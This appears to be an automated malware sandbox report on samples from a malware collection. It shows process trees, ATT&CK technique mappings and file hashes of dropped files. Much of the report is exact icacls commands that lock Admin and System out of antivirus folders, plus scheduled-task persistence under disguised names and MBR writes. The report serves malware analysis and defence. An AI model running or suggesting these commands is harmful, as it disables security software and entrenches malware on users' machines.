  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:6972
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:5732
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:5944
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7156
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5468
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5504
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:6108
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:4212
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:5392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4680
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:6160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:5544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:6088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6200
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:6816
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:644
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5444
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6724
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5688
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5684
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4464
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5432
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:472
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6856
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2972
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6744
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4268
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:3760
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3272
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5240
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6096
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6988
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2112
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:740
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:492
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2032
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6792
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1648

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:7124
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
  2⤵
  PID:6880

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5592
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:6104
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:852
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:6004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Carewmr.vbs"
1⤵
- NTFS ADS
PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.avp.ru/
  2⤵
  PID:6480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff88b483cb8,0x7ff88b483cc8,0x7ff88b483cd8
    3⤵
    PID:5868

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ClassicShell.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ClassicShell.exe"
1⤵
- Writes to the Master Boot Record (MBR)
PID:1660

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\DesktopPuzzle.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\DesktopPuzzle.exe"
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5660

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\ProgramData\Microsoft\Intel\P.exe

Filesize
382KB

MD5
b78c384bff4c80a590f048050621fe87

SHA1
f006f71b0228b99917746001bc201dbfd9603c38

SHA256
8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b

SHA512
479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
